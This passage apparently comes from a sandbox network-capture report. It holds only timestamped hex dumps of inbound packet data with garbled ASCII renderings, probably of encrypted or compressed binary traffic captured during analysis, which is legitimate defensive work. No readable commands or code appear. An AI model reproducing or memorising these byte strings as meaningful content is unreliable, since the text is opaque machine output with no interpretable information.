35 50 89 8b e7 93 ae d0 9b f3 46 f2 1f f4 b8 6b a8 55 40 0e 42 76 9e 31 35 Data Ascii: G&LIl08Kj\|E"yOg`}wsW{s,32i-}vVV/(tSW"7p[J<X-!yV;zqO)3%!3J<N\|hthqT)GWq%U])aeG!nm9Ln5PFkU@Bv15
2023-01-05 12:18:10 UTC	463	IN	Data Raw: 4f a8 5f 76 58 46 e2 8d ed f8 c8 6e 8b 13 10 a6 d3 c9 51 0c 52 69 33 48 dd 28 67 50 66 a1 92 95 53 44 bd a6 f3 8f bf a1 44 86 8d 26 63 48 42 14 a0 86 06 f0 39 fc 82 28 b6 cc 8e 43 cb cf 90 42 76 4b be e4 e1 d9 1f 1e 61 f3 f9 4d af 3a 55 7e 4c e6 4d 22 1a d9 3f 88 9f 6c 6a f8 7b 48 c4 e4 97 00 25 46 2a 1f 89 46 16 d7 02 90 68 52 3f 27 27 82 6c ba 97 57 19 2d 37 8c 45 28 96 56 92 80 2a 8f 8f 18 80 1a c4 77 22 62 a1 84 2f 1f 11 37 85 ec a2 13 5a 27 42 89 8b e9 01 21 1a 22 25 0e 4d 03 4e 76 76 d5 98 88 15 ab 66 21 47 8f 8e e9 5d 86 cd 63 1f 2e 60 32 28 65 aa 50 c5 65 17 db 4a 8b 42 b2 8c ad 77 9a 58 f9 5d dc 34 82 75 85 73 30 42 b7 ec 96 b4 6b 25 ac 44 22 85 1d 6f 25 43 e1 14 a1 0e bf 8b 32 b3 58 35 f7 4d 1d 35 61 5c 96 b5 61 26 e9 04 74 8e 81 8e 58 97 9b 32 Data Ascii: O_vXFnQRi3H(gPfSDD&cHB9(CBvKaM:U~LM"?lj{H%FFhR?''lW-7E(Vw"b/7Z'B!"%MNvvf!G]c.`2(ePeJBwX]4us0Bk%D"o%C2X5M5a\a&tX2
2023-01-05 12:18:10 UTC	479	IN	Data Raw: bf 4a f5 2b d6 2b a9 18 d6 d9 2c fa 99 97 50 ff f2 9a a7 b2 00 97 6d ed 1f fa 6e c1 7e 18 f0 73 f7 f7 75 77 86 a3 6e d3 36 a1 05 1f 6a 6f 9c bf 86 f3 36 2d 24 06 29 08 26 6e 5d 12 af d3 48 bc 7b 97 42 41 76 ce 73 2f 77 5c f8 95 2d dd 1b fe d8 9e 51 c2 b0 78 ce 6c c3 0c c7 06 cd f4 f3 36 11 6b 13 63 e6 ea b8 4a a0 26 a6 90 a0 1c 45 74 b1 c1 02 a6 7a f5 ec 32 91 83 12 d9 8d 77 43 66 e5 e6 ce af b1 e0 df 8b 18 48 bc 58 ba 39 43 a9 02 39 87 7f 8f fe 5c 7c 26 f5 ee c7 cb aa 5c db dd dd 25 41 cd cc b2 43 ae 0e 5b e3 50 47 cc a7 63 9f 24 81 74 a0 c5 07 fc 34 56 c0 3d a0 33 73 84 98 71 76 f6 9f fc b9 c4 18 31 46 aa 27 9d de 72 41 84 77 3d be ab 43 00 db c2 b6 0f ed 5d e0 12 3a 83 b2 e6 26 a4 35 11 fb 04 b8 50 e8 f7 5f 92 2a 27 b7 99 33 63 df 35 f5 0a f5 dc 55 98 Data Ascii: J++,Pmn~suwn6jo6-$)&n]H{BAvs/w\-Qxl6kcJ&Etz2wCfHX9C9\\|&\%AC[PGc$t4V=3sqv1F'rAw=C]:&5P_*'3c5U
2023-01-05 12:18:10 UTC	480	IN	Data Raw: 6e a2 a1 66 69 b2 46 ba 3e e1 b7 b4 06 ef 39 0f 0e f8 dc 35 93 4d db 20 12 b2 52 a5 4f b4 55 f8 b0 bf 37 25 69 1c a3 e3 ff c8 19 c8 f6 5b 74 d6 6c c6 9a de 66 28 28 1b 9e 85 37 e8 96 79 e3 cf d8 24 f1 36 35 37 e8 11 f4 f1 bc 1b c2 f3 89 7b 41 58 05 c6 58 2f 0a 82 11 e6 71 60 19 55 1c 3b 3e 55 0d 55 e3 f5 3c 85 2e b3 7c da c8 71 d6 d0 32 45 f3 90 c1 b6 91 c1 46 e5 49 25 8a aa 93 09 72 d2 ee 68 aa 4b 06 10 a9 95 ea 12 80 18 5c c2 20 02 9a e3 02 9a a4 67 7a c4 94 53 79 f2 fd ba 70 1d 11 ac 87 eb 7a 6d 47 5c 9f 07 1a 9c 95 ed f9 ba 17 23 f7 88 17 34 8a 36 d1 67 5a 39 a4 e1 f5 33 cb 71 e3 2f f6 30 f1 16 b6 88 60 7a d1 99 ec ac 45 45 8c f6 e3 0b 9e f5 2c 58 ca 6e 78 6e 0c 8e 25 55 3e 6e 76 57 67 57 22 2e be b7 da bf 4c 36 73 d3 57 e1 70 d6 66 5e 71 73 08 5e b4 Data Ascii: nfiF>95M ROU7%i[tlf((7y$657{AXX/q`U;>UU<.\|q2EFI%rhK\ gzSypzmG\#46gZ93q/0`zEE,Xnxn%U>nvWgW".L6sWpf^qs^
2023-01-05 12:18:10 UTC	496	IN	Data Raw: f7 33 a1 04 7f fc d1 9b 67 e3 32 2c 85 39 81 ee 55 63 6d 2d 60 2f af 08 f8 2e b2 62 d7 bf de 1d 57 14 58 74 aa 0d 70 ae c6 16 ee 1b 8d 57 b5 75 fd a6 2a de 82 78 d2 91 89 66 2a 63 04 ea 32 d5 a8 47 ae 49 1b 4c cb 5f 89 2c 8c 03 d9 58 62 97 4d e3 c2 c1 01 df a1 87 70 1a 08 06 ab 33 44 c0 1e b8 ba 9f d7 92 d4 cb 02 ac fe f0 1f 2b bc 4b 57 6b a2 58 8c 44 ad 7d 0d 61 c4 de cb 77 40 c0 c5 66 c2 e1 62 1c ed d8 b5 fe e0 22 94 c8 8b 23 46 05 fe 2a 9d 3f 32 de 43 c2 4e bb 08 28 e6 96 7b 63 84 be 1c bf 9d ae e6 aa 03 b5 27 13 b4 a2 e7 6d f6 1a a3 1e c2 65 c6 72 9d 2f 6c 11 45 65 8a a1 17 38 cd 15 f8 8e 33 a0 bb 1b 4e 14 80 5b c2 ad 04 b0 04 66 4a 7e 81 52 d5 33 ed c1 4b 67 4a ba ce 70 73 43 04 cf fb e1 96 b2 af f2 70 62 ea 97 7e 03 85 b9 09 2e 9c 5b 7e 1a 64 21 e4 Data Ascii: 3g2,9Ucm-`/.bWXtpWuxfc2GIL_,XbMp3D+KWkXD}aw@fb"#F*?2CN({c'mer/lEe83N[fJ~R3KgJpsCpb~.[~d!
2023-01-05 12:18:10 UTC	497	IN	Data Raw: 01 fe cd 41 39 b7 a8 09 7c a5 ff 8b ee 1e 3e f3 f1 f6 a7 fd fd fe 4b 6a bb d0 d5 6d f7 97 54 3b c4 6b f3 b6 f5 d9 9c 80 cb 76 cb d6 e7 9b d0 ea f9 02 8e 15 f4 e5 ca f4 bd a2 5f f6 61 64 5d 4e 78 6d 2f 2c 9e 5d 48 ec 8f a8 c6 93 f3 51 ff cf 33 d3 7f 8d d9 81 d8 bd 13 f2 d2 d9 8f db 24 80 bc 95 69 ca 92 77 6e 96 8f 50 26 57 91 2b e7 5a 07 9e 74 db 6e 14 71 5a 2c 6a 68 8d 34 39 55 43 f4 c7 08 d3 f9 34 4f 9a ac 3a 24 2a e8 c5 f8 e0 3d e6 8f 42 44 63 40 06 e0 67 ca ee 44 ff bd 2d 46 4b 3a 36 75 76 a0 dc 19 68 01 80 16 b8 f7 40 e7 ad 4f 7f 5b f3 be 46 36 f0 b3 d5 ef 03 65 d7 2b 7b a2 ac 09 f9 dd 19 d9 16 a5 b9 3d 2d c5 6f f1 72 00 95 f8 43 ae 89 de df 3f de 13 27 b8 67 69 61 65 4e d7 05 0b d2 ea a6 2c 68 39 5d c1 f3 ca 95 ef ab 0a 27 36 19 95 cc 91 38 27 b9 45 Data Ascii: A9\|>KjmT;kv_ad]Nxm/,]HQ3$iwnP&W+ZtnqZ,jh49UC4O:$*=BDc@gD-FK:6uvh@O[F6e+{=-orC?'giaeN,h9]'68'E
2023-01-05 12:18:10 UTC	513	IN	Data Raw: fb ad bb bb 32 ff 35 39 17 4f 81 00 5b 18 93 7d fb 9f ac 3a 0d 0e af 0d c5 4f d3 be eb 79 af 40 6a a8 15 7a 81 69 b0 d0 f8 97 02 35 6a 23 c4 96 f6 84 b8 7f db 98 11 20 aa 5f 7c bd 62 52 81 5d 15 76 a1 72 0d 55 c5 a0 51 44 c4 bc e7 a9 c9 a0 9f d9 61 be 57 ab 8d e6 4e d7 cb 5c 26 d4 69 60 47 cf b1 90 72 9b ce 76 02 7d 6f d7 83 63 91 92 6f 3d 19 e1 e0 2c e0 e7 64 0a 56 a8 df df b7 02 1a e7 57 f3 64 16 f6 e8 01 ea 22 1f da f9 5e e9 af 0d ff 19 47 6a db 85 af 38 12 03 7e 22 e1 40 b1 6c 1c ec 13 26 42 ec a8 a6 d6 e2 9f 27 22 ea 02 e2 0c d4 25 43 a4 04 10 f1 8d 1d ab d9 9a 42 5d 32 b9 20 8d f2 6c b7 1f 6e 86 86 7f 8f f7 3f 68 1a 37 13 c6 02 ed 88 a7 69 f0 6c 4e b8 7f bb 54 5f da c9 1d 8e 70 8d fc 37 29 fd fc 80 56 31 2a 9e 8a ef 6b 7f 15 2e b9 7f b2 b6 4b 79 7b Data Ascii: 259O[}:Oy@jzi5j# _\|bR]vrUQDaWN\&i`Grv}oco=,dVWd"^Gj8~"@l&B'"%CB]2 ln?h7ilNT_p7)V1*k.Ky{
2023-01-05 12:18:10 UTC	514	IN	Data Raw: 3b ef a4 dd 57 98 cb 2f c3 cc 6b 29 41 76 06 0b fc 1e ce c4 c3 b7 56 03 80 4f ce 1d 35 fd da 7c 31 9a b1 b9 5d 1d 54 b7 53 55 65 86 da 3c e9 fe bf 73 ea ef b3 f7 7f 3f f5 d7 1a 61 b2 d0 df f8 22 b6 b3 e5 e5 e8 8f 98 69 63 24 0d 6f eb c1 ab 5b 8d 80 04 dc 36 a6 42 07 10 d4 e8 06 8c a9 cd 46 e8 85 78 34 2b 2d 2b 2e d8 f9 1c ef 37 3e 5d b6 ef 66 11 a3 1a 05 1e d3 46 1f f3 5f 56 49 4c 5a f0 90 5c 89 7a ec 92 5b 82 8e 56 f1 d1 72 61 b9 6b 95 06 8c 78 e2 a8 12 9d aa 50 15 87 44 10 1e 19 1d 00 49 f6 ff 0c 38 27 12 84 c0 08 61 e4 97 07 a2 45 e3 04 04 fc 78 43 fd df c1 51 4b c8 53 97 3d 6e 62 03 52 36 d2 ed 2a 62 a3 08 7b 08 4d 04 c3 53 7b 6c 9d 8a ae 50 31 ec 2c c2 e0 8e 1b 1e 44 9d 3f f1 13 04 20 0e b3 71 59 3d fc be be 6a bc 79 1c fb e5 43 8b 3e 1b a2 78 50 f3 Data Ascii: ;W/k)AvVO5\|1]TSUe<s?a"ic$o[6BFx4+-+.7>]fF_VILZ\z[VrakxPDI8'aExCQKS=nbR6*b{MS{lP1,D? qY=jyC>xP
2023-01-05 12:18:10 UTC	530	IN	Data Raw: 67 b6 8c d4 73 4e e3 16 de a6 98 1e be 01 51 c1 00 94 1d 07 0a 25 32 61 59 d2 f1 91 99 1b 16 6d de f7 c5 ec ae 31 39 a7 04 ad 8b ac 5f 06 34 57 68 b1 b3 29 ed 8f 8b 9c e8 bf 13 78 ce 1b 8b 1d 5a a5 4f 59 b8 15 84 bc d7 f8 fa 2c 3f d5 4f 60 69 41 58 98 4b 09 5e 1c 23 88 9f 17 e6 56 9c 01 72 7f 1b 54 53 77 26 75 8b 4a 04 d9 21 b0 01 fe 02 75 bc 62 3e df 5c b6 1e 61 59 2b f4 d5 ac f3 f3 85 80 22 f9 f6 c8 a8 59 33 d3 6d 04 f9 b0 1d 66 08 33 e6 b3 55 0d 69 b8 93 84 e6 e4 45 d9 9b be a7 8a 34 22 55 91 09 9f 2a 79 05 f6 42 a0 dd 6a f5 b3 87 35 fe da a3 8a 58 7a b6 94 6a 17 65 c6 15 3d 6f 15 f6 57 8e 77 63 28 a0 8f 65 1a 7b ff 8c 6d 04 c9 ee 17 43 ae dc b2 aa 2e 80 29 eb 9e 97 ed e9 7d c5 4d 3e 25 12 94 e7 47 51 75 75 40 c8 38 ae 7a bd 76 fb ec af 5d 13 1b bc 72 Data Ascii: gsNQ%2aYm19_4Wh)xZOY,?O`iAXK^#VrTSw&uJ!ub>\aY+"Y3mf3UiE4"U*yBj5Xzje=oWwc(e{mC.)}M>%GQuu@8zv]r
2023-01-05 12:18:10 UTC	531	IN	Data Raw: b7 78 ab d6 7a 92 61 5a ac c6 4c 1f 93 43 a9 b0 38 d5 ad 8a 27 f8 4b 1c 7d 4f 95 da d2 97 81 ec db 3e 87 53 6b 80 da 5e 9f f6 99 4f 80 68 c0 79 91 e6 61 8d 00 86 28 69 b5 2a 16 b4 df dc e4 de a7 aa 6f 61 aa 32 79 63 16 cc 5c a7 d5 a6 66 1a db 41 f5 a7 bb 4b 3f cb e7 22 66 76 0f 17 83 a0 27 17 de 50 1b 1d b8 3a 32 66 19 02 da aa 16 fe c7 44 b9 de ef 49 1c 23 3e 50 bc 0e 3d a3 c5 61 72 83 e9 54 24 9f e0 ed b1 44 f4 a1 7c 19 c3 d6 b7 f3 d4 62 59 dd df 6d fd f0 30 da 65 28 9a 81 54 f7 8c a6 c6 1c 4a 82 9d 8d dd 35 dd 3c ee 1a 70 1f 3f 61 5e 94 76 99 dc 6d c3 6f ec b9 6c b3 ca f8 7d ce 61 2e 3a 78 82 b8 10 a5 cc 39 62 5e ed d7 5f a7 1f 07 54 7d 45 92 04 61 d7 53 f8 dd 8c 55 77 c2 18 a8 69 66 45 23 62 13 86 aa 18 24 fc 38 dd c0 3d d6 57 6d 29 ff a1 4d 70 03 93 Data Ascii: xzaZLC8'K}O>Sk^Ohya(i*oa2yc\fAK?"fv'P:2fDI#>P=arT$D\|bYm0e(TJ5<p?a^vmol}a.:x9b^_T}EaSUwifE#b$8=Wm)Mp
2023-01-05 12:18:10 UTC	547	IN	Data Raw: 8e fe 17 69 0d 28 37 f9 2e 87 68 c4 11 2f cd e9 dd e6 c8 5a 40 8f 17 29 c3 39 9e ce 9a 8c ad 14 66 e9 94 f8 6d c5 ed 25 09 b1 0e 23 66 54 fe 53 05 be ef 6a 2f ba f1 ce 67 04 58 9b 80 7b d4 39 d9 17 35 de ec f2 24 c8 d4 ec d2 ca c2 19 91 d8 dc f7 4d bf d6 2f 67 dc 73 65 f3 54 e0 e0 39 64 a2 dc 2f 32 d9 6a 9e df 04 4d be 10 48 40 c3 b4 ea db f4 79 e8 c1 16 68 57 69 6e 8d c9 75 76 b1 98 e0 87 22 81 21 4b 5b 5f 20 b9 aa 01 18 77 5b c6 73 c0 ef ae 88 4b 0a 9a 7d 5f 75 d5 4c 9a 1b e5 b3 e1 bb 79 1f 51 ca 57 22 8d 9b ac 96 6d 5b 7a 7f aa cd 83 8d 39 24 0f ed a0 12 44 0e c3 2b f6 35 8f a0 ad e3 f6 74 09 40 cb 3a c1 59 47 85 d0 0c e0 bb a2 e1 51 19 7f be 6b 3f f7 ef 18 ed ee 86 1c 73 0b 0f 55 a8 84 1b 57 b0 d0 46 e5 03 3d 2b 53 20 99 1d 5a 65 5f d4 72 a2 14 cc dd Data Ascii: i(7.h/Z@)9fm%#fTSj/gX{95$M/gseT9d/2jMH@yhWinuv"!K[_ w[sK}_uLyQW"m[z9$D+5t@:YGQk?sUWF=+S Ze_r
2023-01-05 12:18:10 UTC	548	IN	Data Raw: ae 7e bd 28 93 0c f1 7c a9 0b 4b a9 23 36 86 08 93 61 e5 70 3d fd 79 4a 29 fc 44 c9 d7 fd 3b 3b 4e 36 79 93 55 d0 4e 76 ce d8 52 c8 a4 08 38 7d f8 ec ce df 08 60 da 62 59 f4 89 51 d4 81 2a 6a 52 b4 28 ab 50 0f 5d d2 d1 3b cf cb 5d 7a 1f 09 4c 09 ef 24 d9 b0 b4 c6 3d 1e 8f 3c ce dc 2a 87 41 78 f1 ab d6 b5 c8 df 30 9b b0 1c 0c dd 2f 40 17 46 da 2e f4 14 9e bf d4 32 99 28 0b 52 15 68 bf 74 ca 9e 97 e9 c6 40 3e bf b0 ed 08 af 1b 80 75 25 7c bf 37 fa 7d 6f ee 74 82 4c d8 fa fe bd 97 f6 fd de dc 54 e5 c3 bb c1 ff 89 72 c4 b5 43 a8 fb 8f c2 f1 fc 48 d9 cc bd b2 a0 14 74 bb 02 14 59 3b a5 ba 6c 48 c4 35 ed 30 cc 20 76 c3 c1 21 a3 2d 1a 05 c2 36 00 9b 58 80 3f 95 b4 fb 7c 5f d0 f0 b7 bd 99 c8 e0 ae 52 4a 32 8a ef f2 6b c4 fb a2 56 6a c6 9b 3a 5d dd e2 d9 7f 81 46 Data Ascii: ~(\|K#6ap=yJ)D;;N6yUNvR8}`bYQjR(P];]zL$=<Ax0/@F.2(Rht@>u%\|7}otLTrCHtY;lH50 v!-6X?\|_RJ2kVj:]F
2023-01-05 12:18:10 UTC	564	IN	Data Raw: 58 84 66 86 05 d5 20 87 87 2b 32 68 1c 17 0c 1a d4 d8 8c 7a fe c8 7c bb 2f b9 21 d5 32 17 37 02 24 f8 a5 8f 42 1f b4 7b 71 fc 41 f8 00 19 81 1e 51 5d 2a 44 8f 81 d8 3b da 02 c3 dc 53 3c 15 1c 78 52 a1 68 65 29 7c a1 27 4f fa 68 43 c5 84 1a 55 a0 72 86 9e c2 a5 14 ce c9 5a 81 d4 4b e4 0f e7 8f c1 15 d9 10 19 43 80 1d a9 38 74 f6 b6 ef c7 2a f3 6f 7c 5b 12 a6 e5 9d ee db 8b 36 34 45 e8 e5 02 ef 5e 67 10 bd c6 97 6f de e0 8b ff 0c 8f c6 8a 3e 2e a2 58 a4 3c d2 db cf 75 87 70 fd 7d e5 26 0d ea 8d f0 62 c2 f8 cc 5a 49 93 fd 23 18 7c 6f a8 9a ff 46 6c 45 35 9e 3f aa d3 21 85 fe 3d 4e cf 70 f6 63 c7 30 e7 1b 9e c1 fb 2a 41 cf 97 78 c3 8c 5a 92 fc 33 d4 b4 f7 f4 dd 5f 34 5e cc 77 f6 a1 7e be 5e 6b 48 b4 29 df 4c 96 e2 cf df d6 0e d0 d9 09 62 1b 3c 97 bd d4 36 bc Data Ascii: Xf +2hz\|/!27$B{qAQ]D;S<xRhe)\|'OhCUrZKC8to\|[64E^go>.X<up}&bZI#\|oFlE5?!=Npc0*AxZ3_4^w~^kH)Lb<6
2023-01-05 12:18:10 UTC	565	IN	Data Raw: 49 d7 9e 48 8e ef e7 29 53 7d a5 c9 79 95 a8 c8 fc fe bd 65 ff 0f 61 fc f7 96 36 f8 5e 5c 5f 77 ec e3 11 f4 1b f5 7a a5 ef 43 0c 75 ec 15 c0 3b 89 f2 34 ab a4 8d 86 5d 89 73 2b 56 ed ff c6 0a 2e e2 c0 87 96 0a 29 0e eb 12 17 36 5f 0c 80 e0 e8 29 be 47 2a 03 c1 12 ea cf d1 77 be ef 2b a4 53 b8 6c e4 bf d2 fe 1f d4 fd 73 98 27 cf 97 20 0a 57 55 97 8d 2e db b6 6d b3 cb b6 6d db b6 6d db ae 2e db 76 75 d9 36 6f f5 77 e6 37 ef 9d d9 7d 9e d9 bb cf fe f1 6e 64 9f fa 64 46 64 e0 20 0e 32 32 a3 f5 70 79 88 5f f1 0d de d6 ac b2 23 5c 82 0c c9 46 07 00 f1 cf 3c 2e a4 e8 73 4b 7b ad ba 69 0f 4f 13 c1 51 6b 80 bf d1 4e 1d 7d ff 91 3a ab 6a 9a 83 76 00 33 ec de c4 ac df 71 a3 5d 8a 60 9f e2 53 ef cf 75 36 2a 40 2c 4b 6e 05 31 6d e8 21 9a 3d a9 14 aa c9 3d bd 9f be 36 Data Ascii: IH)S}yea6^\_wzCu;4]s+V.)6_)Gw+Sls' WU.mmm.vu6ow7}nddFd 22py_#\F<.sK{iOQkN}:jv3q]`Su6@,Kn1m!==6
2023-01-05 12:18:10 UTC	581	IN	Data Raw: 2b ae 5d b0 fc 59 ce 94 eb 47 e7 4b 62 3b 6d 12 db 26 f3 fd f2 d2 c1 9d 6d 64 bd 83 52 58 03 aa 5c 4d cf c3 40 31 4d 4e e2 c8 8d d3 87 22 8b 23 95 ff fe 4a e5 5b e1 75 17 ae 9c 64 87 e9 b9 c3 1d 7e a8 57 bf 81 ca 8f 6f 93 3f e3 f9 8c 1c e3 bd c8 38 b9 83 59 b1 5b 6c a1 2b d0 c2 38 6f 15 2d b5 ec 91 4f d7 2a ab 0e 19 4f 98 ca b6 30 89 fd 31 47 6f ed 0e 50 1e f0 56 58 84 f7 8f e7 0f f8 37 58 03 e0 03 f8 1b ea 03 c0 fb fe 8d 65 01 80 ff bd 88 86 7d 97 70 fe 9f 05 af 14 2c 7c 78 70 60 20 bf c4 a2 bd b6 a3 6c 42 31 cd 67 15 f6 e7 1c 32 56 82 77 28 14 fa 4d e1 c2 b8 e6 bf c5 65 2a d9 05 5f 60 5b 2d 21 f6 6c ae 11 2c ff f7 fc c7 35 fb b8 ff 07 17 32 71 83 ff b5 90 09 91 8a 3c d8 34 7c e5 4b 42 4f 32 6b ca d3 d0 b3 ef f5 d2 4d a4 03 4d 8f d1 82 00 82 4a 44 23 24 Data Ascii: +]YGKb;m&mdRX\M@1MN"#J[ud~Wo?8Y[l+8o-OO01GoPVX7Xe}p,\|xp` lB1g2Vw(Me_`[-!l,52q<4\|KBO2kMMJD#$
2023-01-05 12:18:10 UTC	582	IN	Data Raw: d7 e8 e0 b6 6c a5 3a 03 49 3e 70 7b 66 86 a1 23 80 33 52 68 55 e9 7a 28 29 02 e9 c2 22 ad 59 a1 98 32 76 5c d5 7a 33 d1 f9 2d c4 89 0d e9 b0 ab 7e 62 b8 33 c8 e5 cb dc 49 de 47 42 b1 28 fc f4 34 71 bb fb 4b db 2b be d5 3a e2 1b 5d a1 41 6e f5 15 9c d9 fa 81 9a 30 a2 bb 87 9b 19 47 c8 7b 22 3b 09 97 06 c5 ad 5b 72 37 c6 a6 48 12 4b f2 22 08 80 b0 56 00 61 7f c5 f0 26 2d 06 31 bf cd 3c d2 63 b1 f4 f0 a5 70 50 6f 97 d9 46 e3 b8 b4 f5 4f 2e ad ca 37 c3 17 79 f7 fb a8 a3 93 72 b5 79 b3 dd 89 b3 63 b8 a7 6d a9 86 43 1e 41 4a e5 aa 42 c0 e5 4c 69 1d f4 26 4c 6a f5 c7 b2 c4 0b f5 14 a5 8b c0 29 d2 3a 19 e7 fa 3b d2 d0 99 7d d4 f4 d0 73 3f d3 39 7d b7 ea 4c 54 cd 54 2e ab c4 c2 d6 38 00 74 a7 4c 4b 19 19 1b 12 36 04 e3 13 1b 28 0e 37 99 e4 ec 7b 09 c3 f2 76 33 77 Data Ascii: l:I>p{f#3RhUz()"Y2v\z3-~b3IGB(4qK+:]An0G{";[r7HK"Va&-1<cpPoFO.7yrycmCAJBLi&Lj):;}s?9}LTT.8tLK6(7{v3w
2023-01-05 12:18:10 UTC	598	IN	Data Raw: 36 01 39 05 dc d5 43 23 76 65 a2 8b f0 0c 71 b7 70 8e 1f d6 e9 ee 5d 6e d3 ee 97 ce 7f ac 36 5f ff fa 75 ac 57 80 3f 81 a5 29 8a 1b 8a 60 3a 7b df 57 f0 ac c6 7b 49 24 85 c5 fe 6d 2f 95 f9 db 8a b7 1d 5c 13 3a 4f c1 07 b9 d2 ad c1 af 28 3d 45 91 8a 75 9f 5c b7 0d 74 06 c2 68 c8 80 bb e2 67 7f e8 e8 6f 7b 05 75 7f cd cb b0 5f e1 d6 d6 ca 9c 37 85 09 b4 d2 a7 05 01 b4 d2 96 21 5d bb 4d f4 49 46 a6 f6 b4 44 9c 11 f0 4c 74 0a bb 1f 27 49 04 92 1b ec c2 dd b8 30 28 78 47 3f b2 6d b7 9f a4 3e 76 e5 5e b2 2d 4d f5 e7 eb 70 7b 2e af 3c 4b 65 5d 86 b8 b5 b1 e6 12 1c 6f ed b6 11 bf 73 f2 00 ab 45 62 f7 83 eb 79 8e 1d 16 8f 0b 00 ae 55 07 cc 64 b0 4b 14 02 2f 90 5a 61 3f 2b 19 92 6b 36 f9 a7 a7 49 7a d8 c3 fd 1d 49 22 01 87 fa c2 71 ce 75 de 39 66 45 dc b3 dc 85 75 Data Ascii: 69C#veqp]n6_uW?)`:{W{I$m/\:O(=Eu\thgo{u_7!]MIFDLt'I0(xG?m>v^-Mp{.<Ke]osEbyUdK/Za?+k6IzI"qu9fEu
2023-01-05 12:18:10 UTC	599	IN	Data Raw: e3 06 09 ca 34 20 c0 c0 ec 65 4b bf 7d 98 48 10 6a 4a c4 20 55 cb 2c 91 8e ac eb 54 66 8e 21 cd b8 8f 37 f7 17 e2 fa 09 b8 8b 39 fb 07 5b ab ec 61 0f 03 a7 72 29 7b 77 35 03 7a e6 75 f4 cc e7 8a 0b 41 76 79 e4 ac 4d 61 66 49 ad 9f 59 0d a8 66 1f e3 48 e2 25 67 50 8a a1 2b 06 bf 3f dc fc 8e b9 2f 9c 08 b2 7d de ef 55 7b 9a 4b 73 b9 7b bf 9e 0d 32 3f 67 31 5b 57 5d 7a 60 a5 aa 08 11 b2 47 39 b1 59 d5 f0 1b 63 3b eb aa 93 ae bd bf 7e 61 cd dc 4c 52 05 2c 1e 6c 01 1c 06 d2 4c 9d 97 5d 70 23 f9 f0 f0 c4 5c aa 89 95 25 3e bb 32 f8 86 47 1b d5 e9 6e 7f 7d ec 2d 9f d8 14 86 c5 05 58 26 e5 2b bf 82 76 86 4f 81 02 f6 cb fe 2b 0a d3 c2 58 33 03 98 b9 88 bf 7f 29 53 79 37 f0 ae 3f ec 6d 4e 50 fc 8f af a8 51 98 3b d5 ec b4 8a 5d 89 9d 08 e0 f3 4b 3b e8 63 77 f7 59 a7 Data Ascii: 4 eK}HjJ U,Tf!79[ar){w5zuAvyMafIYfH%gP+?/}U{Ks{2?g1[W]z`G9Yc;~aLR,lL]p#\%>2Gn}-X&+vO+X3)Sy7?mNPQ;]K;cwY
2023-01-05 12:18:10 UTC	615	IN	Data Raw: a4 d3 58 12 78 b5 ab b1 5e ed 38 42 d6 bf ac 09 ed 66 87 fa b1 66 78 2a 0b d1 b5 de bc 2d 7d b9 fd f1 74 d0 d4 36 7d 32 2b 6a ba 52 c6 78 c8 66 ca 2d 9d aa 2e 96 51 b6 26 e8 17 c8 23 99 9d 91 26 68 d3 56 ef 6b dc 06 79 7b 71 36 8f 5a fc 22 9d f4 80 8e c7 ab 2e 38 65 dc 2e 8d 10 e1 16 4f 26 9b 21 29 2a 33 a3 10 87 dc de cd 97 67 3a da 42 aa d4 b0 4f 45 e3 db 5b 2b 34 34 6b 99 9b b5 22 7a 90 d3 44 0f 80 0c 29 15 95 d1 a8 b5 f8 c6 97 41 7d 9d 8e 39 c4 10 e0 09 24 05 83 22 32 9d 57 75 b3 3c ff 43 a8 60 fa 66 01 aa 3c e9 b3 1d 6d 18 b1 f7 0f 93 21 60 eb b5 db 06 18 d2 da 96 f1 02 91 38 b4 1b 42 7c 0a 99 49 b1 26 90 46 d1 f9 91 53 fa 28 69 7a c3 b6 36 25 4a c5 36 91 b7 42 5e 33 5e 19 39 aa db 90 cc 6a c9 57 14 10 7d 14 3f 8d 78 c2 2b 57 f4 11 44 10 81 7e c2 29 Data Ascii: Xx^8Bffx-}t6}2+jRxf-.Q&#&hVky{q6Z".8e.O&!)3g:BOE[+44k"zD)A}9$"2Wu<C`f<m!`8B\|I&FS(iz6%J6B^3^9jW}?x+WD~)
2023-01-05 12:18:10 UTC	616	IN	Data Raw: da df f5 21 36 3d 89 cf 9e ae bd 7b aa d9 69 8e 81 c8 5b 14 2e 62 56 f1 bd 05 4c c3 fc 73 f5 06 c4 48 80 b5 11 14 a4 0c 07 de 36 51 b9 c6 3b 7b ba 54 7a 50 16 ed 95 42 36 1a cd 5a e1 30 25 57 ca a7 7d fb a1 36 7d 37 c3 65 25 37 e7 03 73 c8 23 98 ea a0 11 63 35 c7 e8 e8 4e fe 71 f4 fd 0d f1 b4 cd 6d c2 04 dc 13 fe 9f 8f 54 6c f2 9d c1 26 35 3f 74 56 73 d9 ac 78 e4 a4 04 45 64 ff e0 89 0e 9a 9e 3e 52 99 76 78 66 5f 93 6b 70 b4 d2 3b 33 f0 f0 5e 18 35 5d f9 90 1f 14 2c 0a ac 7a bd fc e0 94 9f 4d 7c ce 29 aa c2 a2 04 72 c2 fc 13 58 f8 21 3d 95 3a 27 1d 6a 1e 83 54 94 37 47 78 ce 7c fc 09 cf 07 d8 9c cf 06 56 1a 7f 62 31 2b f9 f1 f9 56 c4 be aa 96 4c ad 09 b4 d8 cc ab 3d 9d b1 97 a9 d5 a7 a5 27 3d b0 3a e2 b0 a7 de 26 14 a5 a5 53 82 f9 18 79 dd ba 70 9b 32 cf Data Ascii: !6={i[.bVLsH6Q;{TzPB6Z0%W}6}7e%7s#c5NqmTl&5?tVsxEd>Rvxf_kp;3^5],zM\|)rX!=:'jT7Gx\|Vb1+VL='=:&Syp2
2023-01-05 12:18:10 UTC	632	IN	Data Raw: 98 3c 30 ff aa ea 74 35 d4 7c dc f1 96 5a 00 fe e4 f9 77 be 83 5b 04 80 01 df 19 88 28 90 a5 a0 77 0a 1e 7b e6 9c 07 b1 a2 06 77 76 8e fe ce fa 89 4e cb 0e ea 03 67 d1 bc 0e 69 70 f1 ac 21 ba 0d d2 61 1c 26 aa 6f 76 c0 4b b4 c0 27 20 ef 72 c3 64 2b 51 87 50 6d a3 7c b1 a9 5c ad e5 6d 45 9f 6a a3 37 74 f9 62 c7 cf 24 5b 1d f1 88 39 a6 62 cd fa eb 83 f2 c2 6f 75 ad f5 c1 2d 2d 2d 16 de ce 64 1c e7 8b 72 eb 1d ee f4 04 3e bb 52 2d 6f 51 54 e2 6a d8 ae 53 53 fd 5f 96 e6 5a 34 c7 ee 28 56 c4 a2 28 3b 03 7c bb 07 a9 0e bd 9a 07 20 30 94 0b ba 6f 12 5e 35 69 1a 5e 0a 